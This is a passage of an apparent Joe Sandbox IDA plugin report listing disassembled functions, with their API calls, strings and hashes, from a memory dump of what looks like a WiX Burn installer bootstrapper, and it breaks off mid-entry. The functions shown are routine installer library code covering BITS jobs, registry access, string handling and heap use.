Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: Failed to get BITS job state.$Failure while sending progress.
API String ID: 3094578987-2876445054
Opcode ID: aa1ccea84255d0ae5b4abe8483c1336c0eaae562728c2de1a41af50816d9c6fa
Instruction ID: 69bf691dd6730845bb7ccd65d25c22ebeed9c4ebcf364a16747b836a5227dce5
Opcode Fuzzy Hash: aa1ccea84255d0ae5b4abe8483c1336c0eaae562728c2de1a41af50816d9c6fa
Instruction Fuzzy Hash: E401D872905625BBC721DB5AEC49D6EB7ACFF08321B004266F809D7610D738EE54DBD4

Function 007ED5AF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000008,00000000,00000000,?,007EDD19,?,?,?,?,?,00000001,00000000,?), ref: 007ED5C9
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,007EDD19,?,?,?,?,?,00000001,00000000,?), ref: 007ED5D4
GetLastError.KERNEL32(?,007EDD19,?,?,?,?,?,00000001,00000000,?), ref: 007ED5E1

Strings

Failed to create BITS job complete event., xrefs: 007ED60F
bitsuser.cpp, xrefs: 007ED605

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CreateCriticalErrorEventInitializeLastSection
String ID: Failed to create BITS job complete event.$bitsuser.cpp
API String ID: 3069647169-3441864216
Opcode ID: a2e72631c6fa9ea25bce04e560a9dc0aa2f6f173bdd1cdf8f48d63e6e8e2f7a3
Instruction ID: ae85c6103afb2107a3ba928acea5c8acf35d8269f1a2e463e02ed11d47818504
Opcode Fuzzy Hash: a2e72631c6fa9ea25bce04e560a9dc0aa2f6f173bdd1cdf8f48d63e6e8e2f7a3
Instruction Fuzzy Hash: 40015AB2601726ABD7109B6AE805A87BBE8FF49760B004126F908D7A41E7B498508BE4

Function 007CD39D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,007D6E4B,000000B8,00000000,?,00000000,7694B390), ref: 007CD3AC
InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 007CD3BB
LeaveCriticalSection.KERNEL32(000000D0,?,007D6E4B,000000B8,00000000,?,00000000,7694B390), ref: 007CD3D0

Strings

user active cannot be changed because it was already in that state., xrefs: 007CD3F3
userexperience.cpp, xrefs: 007CD3E9

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CriticalSection$CompareEnterExchangeInterlockedLeave
String ID: user active cannot be changed because it was already in that state.$userexperience.cpp
API String ID: 3376869089-1544469594
Opcode ID: b67aeb4a05c2e2f12b2b190d3b90473da62c8cd790e041598de8310f6648a789
Instruction ID: 29c37f76c64ec453788794faf2af6707052e3843333b3ddf0ace5b8f29463095
Opcode Fuzzy Hash: b67aeb4a05c2e2f12b2b190d3b90473da62c8cd790e041598de8310f6648a789
Instruction Fuzzy Hash: FAF0AF76300309ABD720AFAAAC84E9773ACFB85765B00443EBA01C3640DA78FD058B61

Function 00801B28 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 00801B53
GetLastError.KERNEL32(?,007C48D4,00000001,?,?,007C444C,?,?,?,?,007C535E,?,?,?,?), ref: 00801B62

Strings

srputil.cpp, xrefs: 00801B83
srclient.dll, xrefs: 00801B31
SRSetRestorePointW, xrefs: 00801B48

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: SRSetRestorePointW$srclient.dll$srputil.cpp
API String ID: 199729137-398595594
Opcode ID: 4bebc81c61feb4f9775087e8e3fda44ca93f113ca2459dd5460d6bc3eaee626e
Instruction ID: 345525b097b451bc69c59ab89619d0545f5a8780fcecf356cf26bf02ea539811
Opcode Fuzzy Hash: 4bebc81c61feb4f9775087e8e3fda44ca93f113ca2459dd5460d6bc3eaee626e
Instruction Fuzzy Hash: 8FF0D676B41632A7EB7127795C1D7763680FF10770F018125AC00E62D0FB68DC40D6E5

Function 007F4897 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,007F4848,00000000,?,007F47E8,00000000,00827CF8,0000000C,007F493F,00000000,00000002), ref: 007F48B7
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 007F48CA
FreeLibrary.KERNEL32(00000000,?,?,?,007F4848,00000000,?,007F47E8,00000000,00827CF8,0000000C,007F493F,00000000,00000002), ref: 007F48ED

Strings

CorExitProcess, xrefs: 007F48C2
mscoree.dll, xrefs: 007F48B0

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: acea817268400010c4b2bfe9cb5b01ba692ad051abd897b6aa5603dff5d6cf19
Instruction ID: c14041de265530966bffc62739af5f0de10f4021466263278e6d25931d8fa837
Opcode Fuzzy Hash: acea817268400010c4b2bfe9cb5b01ba692ad051abd897b6aa5603dff5d6cf19
Instruction Fuzzy Hash: DCF04F30A0025CFBCB259BA0EC59BAEBFB8FF44751F100169F905A6290DB784E81CB95

Function 0080937F Relevance: 7.6, APIs: 5, Instructions: 119registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00800E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00805699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00800E52

RegCloseKey.ADVAPI32(00000001,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019,00000001,00000000,00000000,00020019,00000000,00000001), ref: 00809457
RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019), ref: 00809492
RegCloseKey.ADVAPI32(00000001,00000001,00020019,00000000,00000000,00000000,00000000), ref: 008094AE
RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000), ref: 008094BB
RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000), ref: 008094C8

Part of subcall function 00800B49: RegCloseKey.ADVAPI32(00000000), ref: 00800CA0

Part of subcall function 00800E9B: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00809444,00000001), ref: 00800EB3

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Close$InfoOpenQuery
String ID:
API String ID: 796878624-0
Opcode ID: 89099eccce2fc3e0480e2924d8b7ef32d0e101a6adec5e6080dadb1733bc08fa
Instruction ID: b1dd9c8698c99683be6a55f79914d26ad1e9b320d0cd7f292ad29372793e46f7
Opcode Fuzzy Hash: 89099eccce2fc3e0480e2924d8b7ef32d0e101a6adec5e6080dadb1733bc08fa
Instruction Fuzzy Hash: 32414972C0162DFFDF62AF95CD819AEFB79FF04360F15416AE940B6162C3324E419A94

Function 007C88DE Relevance: 7.6, APIs: 5, Instructions: 118stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,007C8A9E,007C95E7,?,007C95E7,?,?,007C95E7,?,?), ref: 007C88FE
lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,007C8A9E,007C95E7,?,007C95E7,?,?,007C95E7,?,?), ref: 007C8906
CompareStringW.KERNEL32(0000007F,?,?,?,?,00000000,?,00000000,00000000,?,?,007C8A9E,007C95E7,?,007C95E7,?), ref: 007C8955
CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,007C8A9E,007C95E7,?,007C95E7,?), ref: 007C89B7
CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,007C8A9E,007C95E7,?,007C95E7,?), ref: 007C89E4

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CompareString$lstrlen
String ID:
API String ID: 1657112622-0
Opcode ID: 061295a0301973bb44ca241ac77e7c814eb83e042a6a33eac542ab0018364974
Instruction ID: 14ef820525a6d15dd87ef96f82008914fbadef742c94572d11b871e925b4db36
Opcode Fuzzy Hash: 061295a0301973bb44ca241ac77e7c814eb83e042a6a33eac542ab0018364974
Instruction Fuzzy Hash: 84314372600119EFCB658F58CC88FBE7F66EB49350F15801DF9599B110CA399D90DB93

Function 007C21BC Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(8007139F,00000000,?,?,00000000,00000000,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C2202
GetLastError.KERNEL32(?,00000000,00000000,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C220E

Part of subcall function 007C3B51: GetProcessHeap.KERNEL32(00000000,000001C7,?,007C21DC,000001C7,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C3B59
Part of subcall function 007C3B51: HeapSize.KERNEL32(00000000,?,007C21DC,000001C7,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C3B60

Strings

strutil.cpp, xrefs: 007C2232

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
String ID: strutil.cpp
API String ID: 3662877508-3612885251
Opcode ID: fe350cf8b16a0053c77fdf28a14086c03bc3753219bfc2514527617b0f26bdd5
Instruction ID: 132cd8da69fa197b35d0af1eed401b49435837c6c1fb49a5bbc37c3c203453f4
Opcode Fuzzy Hash: fe350cf8b16a0053c77fdf28a14086c03bc3753219bfc2514527617b0f26bdd5
Instruction Fuzzy Hash: D831D832600616ABEB209E69CC44F6B77D9FF45760B12422DFC15DB2A1EB38CC02D7A0

Function 007C738E Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(007C52B5,WixBundleOriginalSource,?,?,007DA41D,007C53B5,WixBundleOriginalSource,=S|,0082AA90,?,00000000,007C533D,?,007D7587,?,?), ref: 007C739A
LeaveCriticalSection.KERNEL32(007C52B5,007C52B5,00000000,00000000,?,?,007DA41D,007C53B5,WixBundleOriginalSource,=S|,0082AA90,?,00000000,007C533D,?,007D7587), ref: 007C7401

Strings

Failed to get value of variable: %ls, xrefs: 007C73D4
Failed to get value as string for variable: %ls, xrefs: 007C73F0
WixBundleOriginalSource, xrefs: 007C7396

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls$WixBundleOriginalSource
API String ID: 3168844106-30613933
Opcode ID: 215d1f837e71f27dcf2a0a97cec6aeab8c7ba0144ce567bed76445d9d6d4dc85
Instruction ID: 81fff1a60dedd0c4c7b70f953ddd39147a14dfcd3ea2acfafd014d52bb27bfdf
Opcode Fuzzy Hash: 215d1f837e71f27dcf2a0a97cec6aeab8c7ba0144ce567bed76445d9d6d4dc85
Instruction Fuzzy Hash: D4015A329851A9FBCF155F54CC05F9E3B68EB14761F10816DFC04AA260DB3A9E60EBE0

Function 007ECEF5 Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,00000000,?,00000000,?,007ECEEB,00000000), ref: 007ECF10
CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,007ECEEB,00000000), ref: 007ECF1C
CloseHandle.KERNEL32(0080B508,00000000,?,00000000,?,007ECEEB,00000000), ref: 007ECF29
CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,007ECEEB,00000000), ref: 007ECF36
UnmapViewOfFile.KERNEL32(0080B4D8,00000000,?,007ECEEB,00000000), ref: 007ECF45

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseHandle$FileUnmapView
String ID:
API String ID: 260491571-0
Opcode ID: 44568a2d460de1f57dad69c4953ccb39961c8c69d9c6b8dd8eac1d505b7ef6d6
Instruction ID: b4c696a2b35eb3e53a4a0b054f53f8b67bf9d7a41ba17d768a594479e98fadec
Opcode Fuzzy Hash: 44568a2d460de1f57dad69c4953ccb39961c8c69d9c6b8dd8eac1d505b7ef6d6
Instruction Fuzzy Hash: AD01467A406B59DFCB326F66D890816FBEAFF54311314C83EE29A52921C375A841DF80

Function 008079CC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 007C38D4: GetProcessHeap.KERNEL32(?,000001C7,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38E5
Part of subcall function 007C38D4: RtlAllocateHeap.NTDLL(00000000,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38EC

SysFreeString.OLEAUT32(00000000), ref: 00807B2C
SysFreeString.OLEAUT32(00000000), ref: 00807B37
SysFreeString.OLEAUT32(00000000), ref: 00807B42

Strings

atomutil.cpp, xrefs: 008079FF

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: FreeString$Heap$AllocateProcess
String ID: atomutil.cpp
API String ID: 2724874077-4059165915
Opcode ID: 24687209afffe4d8f73921efd3d8455493821b68697459ff0cc24dec336b1f7b
Instruction ID: 9f4dc469f49ea61eebf70f987cbc14507b8e8f62ce14fcb96350a6d9c46dc4dd
Opcode Fuzzy Hash: 24687209afffe4d8f73921efd3d8455493821b68697459ff0cc24dec336b1f7b
Instruction Fuzzy Hash: 48515F71E0422AAFDB51DB64CC54FAEB7B8FF44764F154568E905EB290DB30EE008BA0

Function 008085CB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 137timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 008086D8
GetLastError.KERNEL32 ref: 008086E2

Strings

clbcatq.dll, xrefs: 008085E9, 008085F4
timeutil.cpp, xrefs: 00808706

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Time$ErrorFileLastSystem
String ID: clbcatq.dll$timeutil.cpp
API String ID: 2781989572-961924111
Opcode ID: ea4be3a6c00eb9f11dcbbc3be8e2ab97c2e3a1844a3973573674db9ac3bea3c4
Instruction ID: d640e273a041a9abd434531d86fe1d570b6f70cefc1a9dd44e327131f739dcc7
Opcode Fuzzy Hash: ea4be3a6c00eb9f11dcbbc3be8e2ab97c2e3a1844a3973573674db9ac3bea3c4
Instruction Fuzzy Hash: 3441D771A40209E6EB60ABB88C49BBF7364FF61704F154519B651E72D0DA36CE8087A5

Function 008035A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(000002C0), ref: 008035BE
SysAllocString.OLEAUT32(?), ref: 008035CE
VariantClear.OLEAUT32(?), ref: 008036AF

Strings

xmlutil.cpp, xrefs: 008035E6

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Variant$AllocClearInitString
String ID: xmlutil.cpp
API String ID: 2213243845-1270936966
Opcode ID: c384725da4fc9a1eaf9384f7fc9adb7cb5847fef22f4a3e07407678df76bb285
Instruction ID: 81c7aa93966118249b37d54670452e0ab208987be5c311b369b02b9c6a6106a1
Opcode Fuzzy Hash: c384725da4fc9a1eaf9384f7fc9adb7cb5847fef22f4a3e07407678df76bb285
Instruction Fuzzy Hash: 30418F7190062AABDB109FA9CC88EABBBBCFF45710B0141A4FC15EB351D735DD009BA0

Function 00800D1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,007E8BD8), ref: 00800D77
RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,007E8BD8,00000000), ref: 00800D99
RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000003,?,?,007E8BD8,00000000,00000000,00000000), ref: 00800DF1

Strings

regutil.cpp, xrefs: 00800DC1

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Enum$InfoQuery
String ID: regutil.cpp
API String ID: 73471667-955085611
Opcode ID: ec964a4561059d0e21db3817c2a0c91cd9c777d4df54d402aa926ee5f301f619
Instruction ID: 67bc3b625c6c858879256a3e065b29801eaabb6ae95784f4b540de99d24b6032
Opcode Fuzzy Hash: ec964a4561059d0e21db3817c2a0c91cd9c777d4df54d402aa926ee5f301f619
Instruction Fuzzy Hash: 4031A1B6A01129FFEB218A99CD84FABB7ADFF04394F114169BD04E7190D7309E119AA0

Function 008078C5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

Part of subcall function 007C38D4: GetProcessHeap.KERNEL32(?,000001C7,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38E5
Part of subcall function 007C38D4: RtlAllocateHeap.NTDLL(00000000,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38EC

SysFreeString.OLEAUT32(00000000), ref: 008079AA
SysFreeString.OLEAUT32(?), ref: 008079B5
SysFreeString.OLEAUT32(00000000), ref: 008079C0

Strings

atomutil.cpp, xrefs: 008078F2

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: FreeString$Heap$AllocateProcess
String ID: atomutil.cpp
API String ID: 2724874077-4059165915
Opcode ID: 7dde834acdc04a45a70a466f6a97757d75709108673573c2d04cbf4eac3112e1
Instruction ID: 46c0061c13eaa411c9f88deb8f97069df7873b943abb6a01debceb4a748afd0d
Opcode Fuzzy Hash: 7dde834acdc04a45a70a466f6a97757d75709108673573c2d04cbf4eac3112e1
Instruction Fuzzy Hash: 74318772D05129FBDB529BA8CC45FAEBBA8FF44714F0541A5E900EB290D738ED019BA0

Function 007E88CF Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00800E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00805699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00800E52

RegCloseKey.ADVAPI32(00000000,00000000,00000088,00000000,000002C0,00000410,00020019,00000000,000002C0,00000000,?,?,?,007E8C14,00000000,00000000), ref: 007E898C

Strings

Failed to open uninstall key for potential related bundle: %ls, xrefs: 007E88FB
Failed to ensure there is space for related bundles., xrefs: 007E893F
Failed to initialize package from related bundle id: %ls, xrefs: 007E8972

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseOpen
String ID: Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$Failed to open uninstall key for potential related bundle: %ls
API String ID: 47109696-1717420724
Opcode ID: 032fb376b0be7b20f9f8dacde1b469a7370480b5c2147c306c250a15ff5bc697
Instruction ID: dd8e4f1e96f9adc3139898ed0e2dadb29d9acbf08884305608c9c8711f1698d0
Opcode Fuzzy Hash: 032fb376b0be7b20f9f8dacde1b469a7370480b5c2147c306c250a15ff5bc697
Instruction Fuzzy Hash: 5A21B232901259FBDB528A85CC06BBEBB78FF08710F144115F914A6151DB79A920AB92

Function 007C3A97 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000010,00000000,80004005,00000000,00000000,00000100,?,007C1472,00000000,80004005,00000000,80004005,00000000,000001C7,?,007C13B7), ref: 007C3AB2
HeapReAlloc.KERNEL32(00000000,?,007C1472,00000000,80004005,00000000,80004005,00000000,000001C7,?,007C13B7,000001C7,00000100,?,80004005,00000000), ref: 007C3AB9

